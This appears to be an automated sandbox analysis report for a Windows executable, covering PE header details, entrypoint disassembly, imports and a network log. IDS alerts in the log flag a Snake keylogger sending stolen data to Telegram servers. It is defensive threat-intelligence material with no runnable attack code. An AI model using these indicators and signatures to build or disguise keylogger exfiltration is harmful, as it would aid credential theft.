                                                                                    Icon Hash:46224e4c19391d03
                                                                                    Entrypoint:0x4034a5
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                    Instruction
                                                                                    sub esp, 000002D4h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    pop edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [esp+14h], ebx
                                                                                    mov dword ptr [esp+10h], 0040A230h
                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                    call dword ptr [004080ACh]
                                                                                    call dword ptr [004080A8h]
                                                                                    and eax, BFFFFFFFh
                                                                                    cmp ax, 00000006h
                                                                                    mov dword ptr [0042A24Ch], eax
                                                                                    je 00007FDDF8E65EA3h
                                                                                    push ebx
                                                                                    call 00007FDDF8E6916Dh
                                                                                    cmp eax, ebx
                                                                                    je 00007FDDF8E65E99h
                                                                                    push 00000C00h
                                                                                    call eax
                                                                                    mov esi, 004082B0h
                                                                                    push esi
                                                                                    call 00007FDDF8E690E7h
                                                                                    push esi
                                                                                    call dword ptr [00408150h]
                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                    cmp byte ptr [esi], 00000000h
                                                                                    jne 00007FDDF8E65E7Ch
                                                                                    push 0000000Ah
                                                                                    call 00007FDDF8E69140h
                                                                                    push 00000008h
                                                                                    call 00007FDDF8E69139h
                                                                                    push 00000006h
                                                                                    mov dword ptr [0042A244h], eax
                                                                                    call 00007FDDF8E6912Dh
                                                                                    cmp eax, ebx
                                                                                    je 00007FDDF8E65EA1h
                                                                                    push 0000001Eh
                                                                                    call eax
                                                                                    test eax, eax
                                                                                    je 00007FDDF8E65E99h
                                                                                    or byte ptr [0042A24Fh], 00000040h
                                                                                    push ebp
                                                                                    call dword ptr [00408044h]
                                                                                    push ebx
                                                                                    call dword ptr [004082A0h]
                                                                                    mov dword ptr [0042A318h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 000002B4h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 004216E8h
                                                                                    call dword ptr [00408188h]
                                                                                    push 0040A384h
                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                    RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                    RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                    RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                    RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                    RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                    RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                    RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                    RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                    RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                    RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                    RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                    RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                    RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                    RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                    RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                    RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                    RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                    RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                    RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                    RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                    RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                    DLLImport
                                                                                    KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                    USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States
                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2025-01-10T21:41:04.055782+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949709142.250.181.238443TCP
                                                                                    2025-01-10T21:41:10.679332+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949711132.226.8.16980TCP
                                                                                    2025-01-10T21:41:17.366602+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949711132.226.8.16980TCP
                                                                                    2025-01-10T21:41:17.999582+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949740149.154.167.220443TCP
                                                                                    2025-01-10T21:41:18.295718+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949740149.154.167.220443TCP
                                                                                    2025-01-10T21:41:19.616728+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949750132.226.8.16980TCP
                                                                                    2025-01-10T21:41:20.221607+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949757149.154.167.220443TCP
                                                                                    2025-01-10T21:41:20.550220+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949757149.154.167.220443TCP
                                                                                    2025-01-10T21:41:22.080335+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949769149.154.167.220443TCP
                                                                                    2025-01-10T21:41:22.413988+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949769149.154.167.220443TCP
                                                                                    2025-01-10T21:41:23.902379+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949782149.154.167.220443TCP
                                                                                    2025-01-10T21:41:24.243171+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949782149.154.167.220443TCP
                                                                                    2025-01-10T21:41:25.754752+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949798149.154.167.220443TCP
                                                                                    2025-01-10T21:41:26.308224+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949798149.154.167.220443TCP
                                                                                    2025-01-10T21:41:27.821372+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949811149.154.167.220443TCP
                                                                                    2025-01-10T21:41:28.116897+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949811149.154.167.220443TCP
                                                                                    2025-01-10T21:41:29.651156+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949827149.154.167.220443TCP
                                                                                    2025-01-10T21:41:29.905652+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949827149.154.167.220443TCP
                                                                                    2025-01-10T21:41:31.373410+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949839149.154.167.220443TCP
                                                                                    2025-01-10T21:41:31.772274+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949839149.154.167.220443TCP
                                                                                    2025-01-10T21:41:33.258256+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949853149.154.167.220443TCP
                                                                                    2025-01-10T21:41:33.621335+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949853149.154.167.220443TCP
                                                                                    2025-01-10T21:41:35.078882+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949865149.154.167.220443TCP
                                                                                    2025-01-10T21:41:35.475737+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949865149.154.167.220443TCP
                                                                                    2025-01-10T21:41:37.005576+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949877149.154.167.220443TCP
                                                                                    2025-01-10T21:41:37.261635+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949877149.154.167.220443TCP
                                                                                    2025-01-10T21:41:38.759064+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949890149.154.167.220443TCP
                                                                                    2025-01-10T21:41:39.030142+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949890149.154.167.220443TCP
                                                                                    2025-01-10T21:41:40.507479+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949905149.154.167.220443TCP
                                                                                    2025-01-10T21:41:40.935980+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949905149.154.167.220443TCP
                                                                                    2025-01-10T21:41:42.455994+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949919149.154.167.220443TCP
                                                                                    2025-01-10T21:41:42.794589+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949919149.154.167.220443TCP
                                                                                    2025-01-10T21:41:44.380265+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949930149.154.167.220443TCP
                                                                                    2025-01-10T21:41:44.714132+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949930149.154.167.220443TCP
                                                                                    2025-01-10T21:41:46.567194+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949946149.154.167.220443TCP
                                                                                    2025-01-10T21:41:47.640280+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949946149.154.167.220443TCP
                                                                                    2025-01-10T21:41:49.400542+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949962149.154.167.220443TCP
                                                                                    2025-01-10T21:41:49.647010+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949962149.154.167.220443TCP
                                                                                    2025-01-10T21:41:51.084566+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949973149.154.167.220443TCP
                                                                                    2025-01-10T21:41:51.526150+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949973149.154.167.220443TCP
                                                                                    2025-01-10T21:41:52.988544+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949988149.154.167.220443TCP
                                                                                    2025-01-10T21:41:53.376503+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949988149.154.167.220443TCP
                                                                                    2025-01-10T21:41:54.843402+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950001149.154.167.220443TCP
                                                                                    2025-01-10T21:41:55.153990+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950001149.154.167.220443TCP
                                                                                    2025-01-10T21:41:56.646970+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950014149.154.167.220443TCP
                                                                                    2025-01-10T21:41:56.893527+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950014149.154.167.220443TCP
                                                                                    2025-01-10T21:41:58.410818+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950022149.154.167.220443TCP
                                                                                    2025-01-10T21:41:58.883067+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950022149.154.167.220443TCP
                                                                                    2025-01-10T21:42:00.462252+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950024149.154.167.220443TCP
                                                                                    2025-01-10T21:42:00.709410+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950024149.154.167.220443TCP
                                                                                    2025-01-10T21:42:02.832012+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950026149.154.167.220443TCP
                                                                                    2025-01-10T21:42:03.304992+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950026149.154.167.220443TCP
                                                                                    2025-01-10T21:42:04.799457+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950028149.154.167.220443TCP
                                                                                    2025-01-10T21:42:05.344060+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950028149.154.167.220443TCP
                                                                                    2025-01-10T21:42:07.009354+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950030149.154.167.220443TCP
                                                                                    2025-01-10T21:42:07.250403+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950030149.154.167.220443TCP
                                                                                    2025-01-10T21:42:09.621156+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950032149.154.167.220443TCP
                                                                                    2025-01-10T21:42:09.956106+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950032149.154.167.220443TCP
                                                                                    2025-01-10T21:42:11.534767+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950034149.154.167.220443TCP
                                                                                    2025-01-10T21:42:11.868333+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950034149.154.167.220443TCP
                                                                                    2025-01-10T21:42:13.132415+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950035132.226.8.16980TCP
                                                                                    2025-01-10T21:42:13.713057+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950036149.154.167.220443TCP
                                                                                    2025-01-10T21:42:13.974062+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950036149.154.167.220443TCP
                                                                                    2025-01-10T21:42:15.429818+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950038149.154.167.220443TCP
                                                                                    2025-01-10T21:42:15.775576+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950038149.154.167.220443TCP
                                                                                    2025-01-10T21:42:17.260407+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950040149.154.167.220443TCP
                                                                                    2025-01-10T21:42:17.647059+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950040149.154.167.220443TCP
                                                                                    2025-01-10T21:42:20.136836+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950042149.154.167.220443TCP
                                                                                    2025-01-10T21:42:20.575719+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950042149.154.167.220443TCP
                                                                                    2025-01-10T21:42:24.950422+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950044149.154.167.220443TCP
                                                                                    2025-01-10T21:42:25.228901+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950044149.154.167.220443TCP
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 10, 2025 21:41:01.937985897 CET49709443192.168.2.9142.250.181.238
                                                                                    Jan 10, 2025 21:41:01.938039064 CET44349709142.250.181.238192.168.2.9
                                                                                    Jan 10, 2025 21:41:01.938168049 CET49709443192.168.2.9142.250.181.238
                                                                                    Jan 10, 2025 21:41:01.953969002 CET49709443192.168.2.9142.250.181.238
                                                                                    Jan 10, 2025 21:41:01.953993082 CET44349709142.250.181.238192.168.2.9
                                                                                    Jan 10, 2025 21:41:02.617229939 CET44349709142.250.181.238192.168.2.9
                                                                                    Jan 10, 2025 21:41:02.617465973 CET49709443192.168.2.9142.250.181.238
                                                                                    Jan 10, 2025 21:41:02.618026018 CET44349709142.250.181.238192.168.2.9
                                                                                    Jan 10, 2025 21:41:02.618311882 CET49709443192.168.2.9142.250.181.238
                                                                                    Jan 10, 2025 21:41:02.812295914 CET49709443192.168.2.9142.250.181.238
                                                                                    Jan 10, 2025 21:41:02.812346935 CET44349709142.250.181.238192.168.2.9
                                                                                    Jan 10, 2025 21:41:02.812716961 CET44349709142.250.181.238192.168.2.9
                                                                                    Jan 10, 2025 21:41:02.813059092 CET49709443192.168.2.9142.250.181.238
                                                                                    Jan 10, 2025 21:41:02.828888893 CET49709443192.168.2.9142.250.181.238
                                                                                    Jan 10, 2025 21:41:02.871325970 CET44349709142.250.181.238192.168.2.9
                                                                                    Jan 10, 2025 21:41:04.055772066 CET44349709142.250.181.238192.168.2.9
                                                                                    Jan 10, 2025 21:41:04.055896044 CET49709443192.168.2.9142.250.181.238
                                                                                    Jan 10, 2025 21:41:04.055911064 CET44349709142.250.181.238192.168.2.9
                                                                                    Jan 10, 2025 21:41:04.055968046 CET49709443192.168.2.9142.250.181.238
                                                                                    Jan 10, 2025 21:41:04.057316065 CET44349709142.250.181.238192.168.2.9
                                                                                    Jan 10, 2025 21:41:04.057358980 CET44349709142.250.181.238192.168.2.9
                                                                                    Jan 10, 2025 21:41:04.057463884 CET49709443192.168.2.9142.250.181.238
                                                                                    Jan 10, 2025 21:41:04.080507994 CET49709443192.168.2.9142.250.181.238
                                                                                    Jan 10, 2025 21:41:04.080528021 CET44349709142.250.181.238192.168.2.9
                                                                                    Jan 10, 2025 21:41:04.119744062 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:04.119796991 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:04.120126009 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:04.120274067 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:04.120285988 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:04.765955925 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:04.766060114 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:04.770020962 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:04.770035982 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:04.770297050 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:04.770354986 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:04.770710945 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:04.811327934 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.186510086 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.186661005 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.192502975 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.192679882 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.204996109 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.205060959 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.205081940 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.205548048 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.211057901 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.211098909 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.286135912 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.286201000 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.286228895 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.286267042 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.286303043 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.286350012 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.286350012 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.286564112 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.286637068 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.286670923 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.286670923 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.286678076 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.287350893 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.288539886 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.288757086 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.288774967 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.288858891 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.296926022 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.299335003 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.299344063 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.301632881 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.314791918 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.315342903 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.315354109 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.316736937 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.321120024 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.321166992 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.321181059 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.321218014 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.322712898 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.322752953 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.322799921 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.322848082 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.324325085 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.324382067 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.324402094 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.324465990 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.325314045 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.325361967 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.325366974 CET44349710142.250.181.225192.168.2.9
                                                                                    Jan 10, 2025 21:41:07.325397968 CET49710443192.168.2.9142.250.181.225
                                                                                    Jan 10, 2025 21:41:07.331069946 CET44349710142.250.181.225192.168.2.9
